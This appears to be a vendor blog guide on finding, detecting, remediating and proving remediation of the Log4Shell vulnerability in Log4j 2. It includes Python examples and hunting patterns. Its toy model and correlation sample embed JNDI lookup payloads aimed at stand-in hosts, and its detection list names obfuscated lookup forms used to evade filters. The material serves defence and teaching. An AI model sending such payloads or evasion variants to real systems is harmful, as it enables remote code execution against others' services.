Log4Shell is one of those security events that permanently changed how teams talk about “risk.” The vulnerability itself, CVE-2021-44228 in Apache Log4j 2, was catastrophic not because it was novel, but because it was ordinary. A logging library. A feature few people had consciously threat-modeled. A dependency that sat quietly inside thousands of services, vendors, appliances, and containers.

The result was a near-perfect storm: trivial exploitation, massive reachability, and a supply-chain-shaped blast radius that made patching feel less like a sprint and more like a long-running operational campaign.

CISA’s guidance frames it bluntly: a critical RCE vulnerability impacting Log4j versions 2.0-beta9 to 2.14.1, known as “Log4Shell.” (CISA) The NVD record reinforces the same scope and provides the canonical vulnerability reference used in audits and risk registers. (Apache Logging Services)

But here’s the part that still trips teams up years later:

- Many organizations can tell you whether they patched a repository.

- Far fewer can prove whether they removed runtime exposure—across every deployed artifact, vendor bundle, shaded jar, legacy container layer, or forgotten internet-facing service.

This guide is built for that second problem. It’s written for security engineers who need a practical playbook: how Log4Shell actually becomes exploitable in real systems, what the Log4j CVE family implies for triage, how to hunt and validate at scale, and how to produce proof-based remediation evidence you can defend during incident review, vendor escalation, or compliance.

The keyword reality: what people actually search for when Log4Shell comes back

When Log4Shell reappears—during a vendor disclosure, a pentest finding, a breach review, or a retroactive “we found it in an appliance”—the head terms that consistently dominate security advisories and response guides are:

- “CVE-2021-44228”

- “Log4Shell”

- “log4j vulnerability”

You see this exact language repeated across authoritative response guidance (CISA’s Log4j vulnerability guidance and alerts), major vendor response pages, and widely referenced detection and response guides. (CISA)

That matters because it signals what searchers want: not a rehash of the headline, but a concrete answer to “How do I find it, fix it, and prove it?”

So that’s what this article delivers.

Why Log4Shell was so dangerous: logging became an execution surface

Log4Shell did not “break Java.” It broke a common assumption: logging is passive.

In affected Log4j 2 versions, attacker-controlled strings could trigger message lookups and JNDI lookups in ways that could lead to remote code execution under certain conditions. Apache’s security advisory pages provide the most defensible description of the vulnerability family and how the initial fix evolved. (Apache Logging Services)

The mental model that keeps you honest

You can think of Log4Shell exploitation as a chain with three links:

- Ingestion: the attacker gets input into your system

- Logging: that input is recorded by Log4j in a way that triggers lookups

- Resolution: the system performs a lookup and reaches out to (or loads) something it shouldn’t

The critical insight: “attacker-controlled input” is much larger than request bodies.

It includes:

- HTTP headers (User-Agent, X-Forwarded-For, Referer)

- URL query strings

- JSON fields and error messages

- Chat messages, usernames, email fields, file names

- Anything that reaches an exception path and gets logged for debugging

That’s why incident response teams found exposure in surprising places: even systems that “don’t accept user input” often log metadata about user interactions.
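To make the three-link chain concrete, here is a toy model in Python. It is not Log4j's code: `ToyLogger`, its simplified `${name:arg}` handling, and the sample header are all illustrative assumptions. The resolver never touches the network; it only records what a lookup-evaluating logger would have tried to reach.

```python
import re

# Toy model only: this is NOT Log4j's implementation.
LOOKUP = re.compile(r"\$\{([a-z]+):([^${}]*)\}")

class ToyLogger:
    """A logger that (unwisely) evaluates ${name:arg} lookups in messages."""

    def __init__(self):
        self.lines = []        # what ended up in the log
        self.resolutions = []  # lookups that would have left the process

    def _resolve(self, match):
        name, arg = match.group(1), match.group(2)
        if name == "lower":
            return arg.lower()
        if name == "upper":
            return arg.upper()
        if name == "jndi":
            # Link 3 (resolution): a real lookup would contact this target.
            self.resolutions.append(arg)
            return "<remote lookup>"
        return match.group(0)  # unknown lookup: leave the text untouched

    def info(self, message):
        # Link 2 (logging): rewrite the message until no lookups remain.
        previous = None
        while previous != message:
            previous, message = message, LOOKUP.sub(self._resolve, message)
        self.lines.append(message)

# Link 1 (ingestion): a header value the application never "uses", only logs.
headers = {"User-Agent": "${jndi:ldap://attacker.example/a}"}
log = ToyLogger()
log.info("request from agent " + headers["User-Agent"])
```

After the call, `log.resolutions` holds the target the logger would have contacted, even though the application code only intended to write a log line. Nested forms such as `${${lower:J}ndi:...}` resolve the same way in this toy, which hints at why static filtering is brittle.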

What exploitation looked like in the wild: scale, automation, and evasion

Cloudflare’s telemetry from early December 2021 is a helpful anchor because it combines mitigation guidance with empirical evidence of what attackers actually sent. Their posts document both: (1) mitigations they deployed and (2) real payload patterns seen in the wild. (The Cloudflare Blog)

Two practical lessons from real payloads



- Static signatures decay fast. Early payloads were obvious. Then attackers started splitting strings, nesting lookups, changing encodings, and generally treating WAF rules like a puzzle. Cloudflare explicitly documented evolving evasion patterns. (The Cloudflare Blog)

- Out-of-band callbacks are the attacker’s favorite “is it alive?” test. Many real-world attempts weren’t immediate RCE; they were DNS/LDAP callbacks to confirm reachability and then pivot to higher-value exploitation.

Unit 42’s write-up is also useful here because it ties telemetry (signature hits) to attack volume over time, reinforcing that exploitation was not only intense at disclosure but persisted as an opportunistic baseline. (Unit 42)

Why it still matters years later: the vulnerability is “sticky” because software is sticky

Log4Shell’s persistence is not mysterious. It is the predictable result of how software is built and shipped.

The long tail is created by:

- Vendor bundles that embed Log4j inside appliances, agents, or management servers

- Shaded jars where dependency scanners miss embedded copies

- Containers and golden images that are never rebuilt

- Legacy services that are still reachable but no longer actively maintained

- Third-party products in environments where the customer can’t patch directly

Google Cloud’s security team wrote early on that organizations struggle to assess scope because it’s not obvious which systems use Log4j; that point remains true whenever you inherit a complex environment or manage thousands of services. (Google Cloud)

CISA’s GitHub repository that tracked affected vendors and software lists is a historical marker of how broad the ecosystem impact was, and it includes guidance urging upgrades to the then-recommended fixed versions. (GitHub)

And the core “lesson learned” narrative has been repeated across post-event analysis: Log4Shell was a supply-chain-scale incident that exposed systemic weaknesses in open-source consumption and enterprise inventory. (DHS)

The Log4j CVE family: treat it as a cluster, not a single ticket

One of the fastest ways to get burned in a remediation program is to treat Log4Shell as only CVE-2021-44228.

Apache’s security page describes how the initial fix in 2.15.0 was incomplete under certain non-default configurations, leading to follow-on CVEs. (Apache Logging Services)

Practical triage table

| CVE | What it is | Typical impact | Threat model nuance | Where to anchor your claims |
|---|---|---|---|---|
| CVE-2021-44228 | Log4Shell, JNDI lookup exposure in Log4j 2 | RCE in worst-case paths, often OOB callbacks | Requires attacker-controlled data to reach vulnerable logging behavior | Apache security guidance, CISA guidance (Apache Logging Services) |
| CVE-2021-45046 | Incomplete fix edge cases | Potential RCE / info leak in certain configs | Non-default pattern layouts and context lookups can matter | Apache security guidance (Apache Logging Services) |
| CVE-2021-45105 | Recursion leading to DoS | Availability impact | Teams often ignore DoS when focused on RCE | Vendor FAQs, response guides (Atlassian Support) |
| CVE-2021-44832 | Config-file modification scenario | RCE if attacker can modify config | Requires a foothold that can write config; still serious in some environments | Apache security guidance (Apache Logging Services) |
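One way to operationalize “treat it as a cluster” is to triage each discovered version against the release that closes the whole family, not only CVE-2021-44228. The sketch below does that in Python. The floor versions reflect my reading of Apache's advisories (2.17.1, 2.12.4, and 2.3.2 for the three maintenance lines) and should be confirmed against the Apache security page; `triage` and its labels are hypothetical names.

```python
import re

# Assumed minimum fully fixed release per maintenance line; confirm these
# against the Apache security page before relying on them.
FIXED_FLOOR = {
    (2, 3): (2, 3, 2),    # Java 6 line
    (2, 12): (2, 12, 4),  # Java 7 line
}
DEFAULT_FLOOR = (2, 17, 1)  # Java 8+ line

def parse_version(text):
    """Return (major, minor, patch), or None for non-release strings."""
    match = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?", text.strip())
    if not match:
        return None  # e.g. "2.0-beta9": route to manual review
    major, minor, patch = match.groups()
    return int(major), int(minor), int(patch or 0)

def triage(version_text):
    """Classify a log4j-core version string for remediation triage."""
    version = parse_version(version_text)
    if version is None:
        return "review"
    if version[0] != 2:
        return "not-log4j2"  # e.g. Log4j 1.x needs its own track
    floor = FIXED_FLOOR.get(version[:2], DEFAULT_FLOOR)
    return "fixed" if version >= floor else "upgrade"
```

A version such as 2.15.0 or 2.16.0 comes back as `upgrade` here even though it addresses the original CVE, which is the point of triaging against the cluster.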

Don’t confuse Log4j 1.x with Log4j 2.x

Log4Shell is a Log4j 2 story. Some environments still contain Log4j 1.2.x, which is end-of-life and has separate issues and mitigations. The remediation logic is different; don’t conflate the CVE narratives in your reports.

The three most common defensive failures

Failure 1: “We blocked it in the WAF”

WAF rules and upstream protections matter—Cloudflare deployed WAF mitigations rapidly and documented mitigation approaches. (The Cloudflare Blog)

But WAF-only defense fails because:

- Not all ingestion is HTTP

- Not all traffic crosses the WAF

- Internal systems can still be exploited laterally

- Payloads mutate

Treat WAF as a speed bump, not a fix.



Failure 2: “Our SCA tool says we’re clean”

SCA is necessary. But it’s blind to:

- Runtime classpath differences

- Shaded and repackaged jars

- Bundled vendor products

- Old container layers

It also often can’t answer: “Is this class actually loaded at runtime?”

Failure 3: “We patched, therefore we’re safe”

In mature environments, “patched” must mean:

- Patched in source

- Patched in build artifacts

- Patched in deployed runtime

- Verified through proof

If you can’t show proof, you’re relying on optimism—and optimism doesn’t survive incident review.

A field workflow: from inventory to proof-based remediation

Step 1: Inventory across three planes

Plane A: Code and dependencies

- repos, build files, dependency graphs

Plane B: Artifacts

- jars, wars, vendor distributions, packages, installers

Plane C: Runtime

- containers, VMs, k8s pods, serverless layers, appliances

CISA’s vendor/software tracking repo is a reminder that plane B and C matter as much as plane A in real life. (GitHub)
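The value of keeping three planes separate shows up when you compare them. The following Python sketch assumes you already have, per service, the set of log4j-core versions seen in each plane; the dictionaries and service names are made-up sample data, and `plane_gaps` is a hypothetical helper.

```python
# Hypothetical inventory results: service name -> log4j-core versions seen.
code_plane = {"payments": {"2.17.1"}, "search": set()}
artifact_plane = {"payments": {"2.17.1"}, "search": {"2.14.1"}}
runtime_plane = {"payments": {"2.17.1", "2.14.1"}, "search": {"2.14.1"}}

def plane_gaps(code, artifacts, runtime):
    """Return versions present downstream that the code plane never declared."""
    gaps = {}
    for service in sorted(set(code) | set(artifacts) | set(runtime)):
        declared = code.get(service, set())
        shipped = artifacts.get(service, set()) | runtime.get(service, set())
        undeclared = shipped - declared
        if undeclared:
            gaps[service] = sorted(undeclared)
    return gaps

gaps = plane_gaps(code_plane, artifact_plane, runtime_plane)
```

In this sample both services surface a 2.14.1 copy that the repository view would never have reported: one from a stale runtime, one from a bundled artifact.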

Step 2: Run SBOM and artifact scanning on what you ship

Example using syft + grype:

# Generate an SBOM for a container image

syft ghcr.io/acme/payments:prod -o spdx-json > sbom.spdx.json

# Vulnerability scan the same image

grype ghcr.io/acme/payments:prod --only-fixed=false

The point isn’t “which tool.” The point is: scan the artifacts you deploy, not only your repo.
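Once an SBOM exists, pulling out the Log4j entries is a small parsing job. This Python sketch reads the SPDX JSON structure (`packages`, `name`, `versionInfo` are SPDX 2.x field names); how a given tool spells Maven package names is an assumption, so the match accepts both a bare `log4j-core` and a `group:log4j-core` form. The inline sample stands in for a real SBOM file.

```python
import json

def log4j_core_packages(sbom):
    """Yield (name, version) for log4j-core entries in an SPDX JSON document."""
    for package in sbom.get("packages", []):
        name = package.get("name", "")
        if name == "log4j-core" or name.endswith(":log4j-core"):
            yield name, package.get("versionInfo", "unknown")

# Inline sample standing in for an SBOM file such as sbom.spdx.json.
sample = json.loads("""
{"packages": [
  {"name": "log4j-core", "versionInfo": "2.14.1"},
  {"name": "log4j-api", "versionInfo": "2.14.1"},
  {"name": "slf4j-api", "versionInfo": "1.7.32"}
]}
""")
found = list(log4j_core_packages(sample))
```

Against a real file, the same function can be fed `json.load(open("sbom.spdx.json"))`. Note that `log4j-api` is deliberately not reported, since the lookup code lives in log4j-core.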

Step 3: Verify runtime presence of log4j-core

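A critical nuance in many environments: you’ll see “log4j” references that aren’t actually the vulnerable component. For example, log4j-api on its own, or bridges such as log4j-over-slf4j, do not contain the JndiLookup class; the vulnerable code lives in log4j-core.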

If you’re doing quick runtime checks on hosts or inside containers:

# Find potential Log4j core jars

find / -type f -name "log4j-core-*.jar" 2>/dev/null | head -n 20

# Inspect jar contents for the vulnerable lookup class

jar tf /path/to/log4j-core-*.jar | grep -E "JndiLookup\.class|JndiManager\.class" | head

This won’t replace a full inventory, but it helps confirm whether a runtime environment even carries the risky classes.
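The `find` check above only sees jars named `log4j-core-*.jar` at the top level. A fat jar, a WAR, or a shaded bundle hides the class one or more archive layers down. The Python sketch below walks nested archives using only the standard library; `find_jndi_lookup`, the depth limit, and the suffix list are illustrative choices, and matching on the class file name alone is intentionally loose so relocated packages are still reported.

```python
import io
import zipfile

TARGET_CLASS = "JndiLookup.class"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear")

def find_jndi_lookup(archive, label, max_depth=4):
    """Return paths of every JndiLookup.class, descending into nested archives.

    `archive` is a path or a binary file object; `label` names it in results.
    """
    hits = []
    with zipfile.ZipFile(archive) as zf:
        for entry in zf.namelist():
            if entry.rsplit("/", 1)[-1] == TARGET_CLASS:
                # File-name match also catches shaded (relocated) copies.
                hits.append(f"{label}!/{entry}")
            elif entry.lower().endswith(ARCHIVE_SUFFIXES) and max_depth > 0:
                nested = io.BytesIO(zf.read(entry))
                try:
                    hits += find_jndi_lookup(nested, f"{label}!/{entry}", max_depth - 1)
                except zipfile.BadZipFile:
                    pass  # named like an archive but not one; skip it
    return hits
```

Calling `find_jndi_lookup("/path/to/app.jar", "app.jar")` returns entries such as `app.jar!/BOOT-INF/lib/...jar!/org/apache/.../JndiLookup.class`, which doubles as evidence of exactly where the class was found.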

Detection and hunting: how to find attempted exploitation and suspicious outcomes

MITRE ATT&CK maps “Exploit Public-Facing Application” as T1190, which is a common initial access technique for internet-facing exploitation campaigns. (Cyber.gov.au) Log4Shell activity frequently begins as T1190, but investigation should quickly expand into credential access, lateral movement, persistence, and exfiltration depending on what you find.

Hunting Layer 1: Ingress telemetry

Start with web logs, API gateways, reverse proxies, and WAF logs.

Look for:

- suspicious ${ patterns

- odd encodings

- payload fragments across multiple fields

- unusual user agents or referrers combined with errors

Example “broad match” patterns (intentionally loose to avoid false negatives):

${jndi:

${${lower:

${${upper:

${::-j

jndi:ldap

jndi:rmi

jndi:dns

Cloudflare’s analysis of real payloads is helpful for understanding why loose matching matters: attackers quickly moved beyond simple jndi:ldap strings. (The Cloudflare Blog)
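Loose substring lists help, but the nested and default-value tricks still split the word `jndi` apart. A common complement is to normalize a field before matching. The Python sketch below is a best-effort approximation under my own assumptions, not a complete model of Log4j's lookup grammar: it URL-decodes, collapses `${lower:x}` / `${upper:x}` and `${...:-x}` forms to the literal `x`, then checks both the raw and the normalized text.

```python
import re
from urllib.parse import unquote

# Collapse ${lower:x} / ${upper:x} and default-value forms such as ${::-x}
# or ${env:NAME:-x} to the literal "x". Innermost lookups reduce first.
SIMPLE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
DEFAULT_VALUE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")

def normalize(value, max_rounds=10):
    """Best-effort de-obfuscation of a logged field before matching."""
    text = unquote(value)
    for _ in range(max_rounds):
        reduced = DEFAULT_VALUE.sub(r"\1", SIMPLE_LOOKUP.sub(r"\1", text))
        if reduced == text:
            break
        text = reduced
    return text.lower()

def looks_like_log4shell(value):
    """Loose match on both the raw and the de-obfuscated text."""
    raw = unquote(value).lower()
    return "jndi:" in raw or "jndi:" in normalize(value)
```

Checking the raw text as well as the normalized text is deliberate: normalization can itself be fooled, so the raw check keeps the obvious cases from slipping through. Expect false positives; this is a triage filter, not a verdict.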

Hunting Layer 2: Egress telemetry

Egress is often the fastest “something is wrong” signal because many application tiers should not make outbound LDAP or RMI calls to the internet.

Flag:

- outbound LDAP (389), LDAPS (636)

- unexpected DNS queries to untrusted domains from app tiers

- outbound traffic from Java processes to unusual hosts
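As a rough illustration of the egress check, the Python sketch below filters connection records for directory and RMI ports leaving private address space. The tuple shape is a hypothetical stand-in for flow logs or firewall exports, and port 1099 (the default RMI registry port) is my addition to the LDAP ports listed above.

```python
import ipaddress

# LDAP/LDAPS from the list above, plus the default RMI registry port.
WATCHED_PORTS = {389: "ldap", 636: "ldaps", 1099: "rmi"}

def flag_egress(connections):
    """Yield (src, dst, service) for watched ports leaving private space.

    `connections` is an iterable of (src_ip, dst_ip, dst_port) tuples.
    """
    for src, dst, port in connections:
        service = WATCHED_PORTS.get(port)
        if service and not ipaddress.ip_address(dst).is_private:
            yield src, dst, service

flows = [
    ("10.0.1.15", "10.0.9.20", 389),  # internal directory: expected
    ("10.0.1.15", "8.8.8.8", 389),    # app tier to internet LDAP
    ("10.0.2.7", "1.1.1.1", 443),     # ordinary HTTPS
    ("10.0.2.7", "1.0.0.1", 1099),    # app tier to internet RMI
]
flagged = list(flag_egress(flows))
```

Attackers are not obliged to use default ports, so a port list like this is a starting signal. An allow-list of destinations per application tier is the stronger long-term control.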

Hunting Layer 3: Endpoint behavior

On endpoints, look for:

- Java spawning shells unexpectedly

- new scheduled tasks / persistence

- suspicious child processes under Tomcat/Java

- unexpected downloads or new jars in writable directories
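The “Java spawning shells” check reduces to a parent/child join over a process snapshot. Here is a minimal Python sketch; the dictionary shape (`pid`, `ppid`, `name`) is a hypothetical stand-in for an EDR or `ps` export, and the shell list is illustrative, not exhaustive.

```python
SHELLS = {"sh", "bash", "dash", "zsh", "cmd.exe", "powershell.exe"}
JAVA_NAMES = {"java", "java.exe"}

def java_spawned_shells(processes):
    """Return (parent_pid, child_pid, child_name) where Java launched a shell.

    `processes` is a list of dicts with pid, ppid and name keys.
    """
    names = {p["pid"]: p["name"].lower() for p in processes}
    return [
        (p["ppid"], p["pid"], p["name"])
        for p in processes
        if p["name"].lower() in SHELLS and names.get(p["ppid"]) in JAVA_NAMES
    ]

snapshot = [
    {"pid": 1, "ppid": 0, "name": "systemd"},
    {"pid": 400, "ppid": 1, "name": "java"},
    {"pid": 812, "ppid": 400, "name": "bash"},  # shell under Java: flag
    {"pid": 900, "ppid": 1, "name": "bash"},    # ordinary login shell
]
suspicious = java_spawned_shells(snapshot)
```

Some applications legitimately shell out from Java, so results need a per-service baseline before they become alerts.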

Practical log queries: examples from major platforms

Google Cloud Logging published specific detection guidance and query approaches for Log4j exploitation patterns, which can be adapted across log platforms. (Google Cloud Documentation)

Splunk also published continued detection ideas for exploitation patterns and investigation pivots. (Splunk)

Here’s a generic structure you can adapt:

Pseudo-query:

- Find requests containing ${ in high-risk fields

- Correlate with server errors or suspicious outbound connections

- Pivot to host telemetry for affected instances
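The pseudo-query can be sketched in Python as a time-window join between ingress and egress records. Everything about the record shape here (`host`, `time`, `field_value`, `dst`) is a hypothetical export format, and the 30-second window is an arbitrary starting point.

```python
from datetime import datetime, timedelta

def correlate(ingress, egress, window=timedelta(seconds=30)):
    """Pair suspicious requests with outbound connections from the same host.

    ingress items need host, time, field_value; egress items need host,
    time, dst. Only egress at or shortly after the request is paired.
    """
    pairs = []
    for req in ingress:
        if "${" not in req["field_value"]:
            continue
        for conn in egress:
            delay = conn["time"] - req["time"]
            if conn["host"] == req["host"] and timedelta(0) <= delay <= window:
                pairs.append((req["host"], req["field_value"], conn["dst"]))
    return pairs

t0 = datetime(2021, 12, 10, 12, 0, 0)
ingress = [
    {"host": "web-1", "time": t0, "field_value": "${jndi:ldap://x.example/a}"},
    {"host": "web-2", "time": t0, "field_value": "curl/7.79.1"},
]
egress = [
    {"host": "web-1", "time": t0 + timedelta(seconds=2), "dst": "x.example:389"},
    {"host": "web-1", "time": t0 + timedelta(minutes=5), "dst": "repo.example:443"},
]
hits = correlate(ingress, egress)
```

Each resulting pair names a host to pivot into for the third step. In a real log platform the same logic is usually a join on host with a bounded time delta.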

Remediation that holds up under audit

The cleanest remediation: upgrade to safe Log4j versions

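Your fixed-version statement should be anchored in Apache’s security page and/or CISA’s guidance. Apache’s security page lists 2.17.1 (Java 8 and later), 2.12.4 (Java 7), and 2.3.2 (Java 6) as the releases that address the full CVE family described above.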

- Apache maintains the security advisories and fix narratives. (Apache Logging Services)

- CISA guidance and tracking emphasized upgrading and monitoring updates. (CISA)

Emergency mitigation: removing JndiLookup, with discipline

In the early period, one widely discussed mitigation approach was removing the JndiLookup class from the Log4j jar when an immediate upgrade wasn’t feasible. Cloudflare’s mitigation guidance documented similar emergency approaches and WAF defenses. (The Cloudflare Blog)

If you use emergency mitigations, treat them as temporary and record them as technical debt.

# Emergency mitigation example: remove JndiLookup class from log4j-core jar

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

Structural hardening: fixes that reduce the blast radius next time

- Egress control: app tiers should not arbitrarily reach LDAP/RMI on the public internet

- Least privilege: reduce the chance config-write paths become RCE (relevant to CVE-2021-44832’s threat model) (Apache Logging Services)

- Segmentation: contain compromise to a smaller zone

- Runtime observability: treat “what’s running” as a first-class security asset, not an afterthought

Proof-based remediation: the difference between “patched” and “safe”

For many teams, the hardest part wasn’t upgrading Log4j. It was proving that every deployed runtime was truly clean.

Here’s what a strong “proof packet” looks like.

Proof Packet Checklist

1) Runtime version evidence

- container digest / image ID

- deployment ID or rollout record

- hostnames / cluster IDs where verified

2) Component evidence

- confirmed Log4j core versions in runtime

- hash of relevant jars

- confirmation that vulnerable classes aren’t present (or not loadable)

3) Configuration evidence

- relevant logging configuration

- confirmation that risky lookup behavior is not enabled

4) Exploit-path evidence

- controlled OOB callback test that previously triggered, now does not

- log and network evidence documenting “no outbound resolution occurred”
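A proof packet is easier to defend when it is a structured record and not a collection of screenshots. The Python sketch below shows one possible shape covering the four evidence groups. All field names are hypothetical, the placeholder strings stand for values you would pull from your own deployment tooling, and the jar bytes are a stand-in for reading the real file.

```python
import hashlib
import json

def jar_evidence(name, data, version):
    """Describe one jar: where it was found, its version, and its SHA-256."""
    return {"jar": name, "version": version,
            "sha256": hashlib.sha256(data).hexdigest()}

def build_proof_packet(image_digest, deployment_id, jars, oob_callbacks_seen):
    """Assemble the four evidence groups into one JSON-serializable record."""
    return {
        "runtime": {"image_digest": image_digest, "deployment_id": deployment_id},
        "components": jars,
        "configuration": {"notes": "attach logging config separately"},
        "exploit_path": {"oob_callbacks_seen": oob_callbacks_seen,
                         "passed": oob_callbacks_seen == 0},
    }

packet = build_proof_packet(
    image_digest="sha256:<digest of the deployed image>",
    deployment_id="<rollout record id>",
    jars=[jar_evidence("/app/lib/log4j-core-2.17.1.jar", b"jar bytes here", "2.17.1")],
    oob_callbacks_seen=0,
)
print(json.dumps(packet, indent=2))
```

Storing the jar hash alongside the image digest lets a reviewer re-verify the claim later without trusting the original scan output.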

Cloudflare’s “payloads captured in the wild” is also valuable as a reference for what you might see in logs, and it can help incident reviewers understand why string matching is not sufficient. (The Cloudflare Blog)

A safe validation approach: OOB-only confirmation

In many enterprise contexts, you do not need (or want) to run weaponized RCE proof-of-concepts in production.

Instead:

- use a controlled domain you own

- send benign probes designed to trigger only a DNS callback if vulnerable

- verify whether any outbound lookups occur from the target environment

This gives you a defensible “before/after” validation without deploying payloads that could cause damage.
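The bookkeeping side of OOB-only validation can be sketched in Python: give each target a unique DNS label, then attribute logged queries back to targets. The probe delivery itself is out of scope here. `assign_tokens`, `callbacks_by_target`, and the zone name are hypothetical, and the query list stands in for logs from the authoritative server of a domain you control.

```python
import secrets

def assign_tokens(targets):
    """Give every target a unique, unguessable DNS label for its probe."""
    return {secrets.token_hex(8): target for target in targets}

def callbacks_by_target(tokens, dns_queries, zone):
    """Map each target to the logged query names that carried its token.

    `dns_queries` is an iterable of query names seen by the authoritative
    server for `zone`; how those logs are exported is left to the reader.
    """
    results = {target: [] for target in tokens.values()}
    suffix = "." + zone.lower().rstrip(".")
    for name in dns_queries:
        name = name.lower().rstrip(".")
        if not name.endswith(suffix):
            continue
        # The token is the label immediately left of the zone.
        label = name[: -len(suffix)].split(".")[-1]
        if label in tokens:
            results[tokens[label]].append(name)
    return results
```

Run the same correlation before and after remediation: a target whose list was non-empty before the fix and is empty afterward gives you the “before/after” pair for the proof packet. An empty list only counts as evidence if you also confirmed that the probe reached a logging path.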

Operational reality: vendor products and inherited risk

If you only secure what you build, you will miss the biggest Log4Shell exposures.

Atlassian’s later FAQ-style guidance on Log4j issues illustrates a vendor reality: products can be impacted across multiple CVEs, and upgrade timelines can track vendor policies. (Atlassian Support)

CISA’s affected-software list repository is a historical artifact of a broader truth: modern organizations inherit a large fraction of their runtime risk from third parties. (GitHub)

A practical vendor escalation checklist usually asks for:

- exact product versions

- whether Log4j is bundled

- whether the vulnerable code is reachable in default configs

- fixed versions or mitigation guidance

- evidence-based validation steps customers can run

A quick-reference table you can paste into incident docs

| Workstream | Goal | What “done” looks like | Evidence artifacts |
|---|---|---|---|
| Asset discovery | Find where Log4j exists | You can list every runtime carrying log4j-core | SBOMs, scan reports, repo dependency graphs |
| Reachability analysis | Determine exploitability | You can identify logged attacker-controlled inputs | code review notes, ingress log samples |
| Detection | Find exploitation attempts | You can show hunt results across logs + network | saved queries, alerts, dashboards |
| Remediation | Remove vulnerable exposure | Upgraded/mitigated across all runtimes | deploy records, jar hashes, version proofs |
| Validation | Prove remediation works | OOB tests show no callbacks post-fix | test logs, DNS logs, egress logs |
| Vendor management | Cover third-party risk | vendors confirm fixed versions + patches shipped | vendor advisories, tickets, attestations |

Log4Shell is the archetype of a modern problem where white-box confidence can fail in production. Your repo might be patched, but the vulnerable component can still exist inside a vendor bundle, a shaded jar, or an artifact that didn’t get rebuilt.

Penligent has published a Log4Shell-focused retrospective that frames CVE-2021-44228 as a “modern” class of long-lived dependency risk and discusses how exploitation patterns and verification expectations evolved, with CISA’s guidance as the context anchor for impact. (CISA) A second Penligent article covers the product’s angle on proof and validation. Both are listed in the references.

If you’re validating remediation in a messy estate, the practical value of an AI-assisted pentesting platform isn’t “spraying payloads.” It’s reducing the time from suspicion to evidence:

- identifying ingestion points that actually hit vulnerable logging paths

- adapting probe patterns to bypass brittle filters in a controlled way

- producing an evidence bundle that clearly shows “reachable vs not reachable” and “before vs after”

That “proof over assumption” posture aligns with what post-event reviews repeatedly emphasized: inventory and verification gaps are where the real operational pain lives. (Atlantic Council)

References

- Apache Logging Services — Security advisories and CVE narratives for Log4j (Apache Logging Services)

- CISA — Apache Log4j vulnerability guidance overview (CISA)

- CISA Alert — Apache releases Log4j 2.15.0 under exploitation (CISA)

- Cloudflare — Inside the Log4j2 vulnerability, history and mitigations (The Cloudflare Blog)

- Cloudflare — Actual CVE-2021-44228 payloads captured in the wild (The Cloudflare Blog)

- Cloudflare — Exploitation before public disclosure and WAF evasion evolution (The Cloudflare Blog)

- Rapid7 — Widespread exploitation and response context (Rapid7)

- Rapid7 — Guide to Log4Shell for defenders (Rapid7)

- Google Cloud — Threat intelligence recommendations and scope challenges (Google Cloud)

- Google Cloud Logging — Detection queries and guidance (Google Cloud Documentation)

- MITRE ATT&CK — T1190 Exploit Public-Facing Application (Cyber.gov.au)

- Unit 42 — Root cause analysis and telemetry observations (Unit 42)

- CISA Log4j affected vendors/software tracking repo (archived) (GitHub)

- DHS archive announcement about CSRB Log4j review report (context) (DHS)

- GreyNoise analysis of CSRB Log4j report takeaways (GreyNoise)

- Atlantic Council discussion referencing Log4Shell lessons and CSRB context (Atlantic Council)

- Penligent Hacking Labs — Log4Shell is the New SQLi, a modern retrospective on CVE-2021-44228 for the AI era https://www.penligent.ai/hackinglabs/log4shell-is-the-new-sqli-a-modern-retrospective-on-cve-2021-44228-for-the-ai-era/

- Penligent Hacking Labs — Claude Code Security and Penligent: from white-box findings to black-box proof https://www.penligent.ai/hackinglabs/claude-code-security-and-penligent-from-white-box-findings-to-black-box-proof/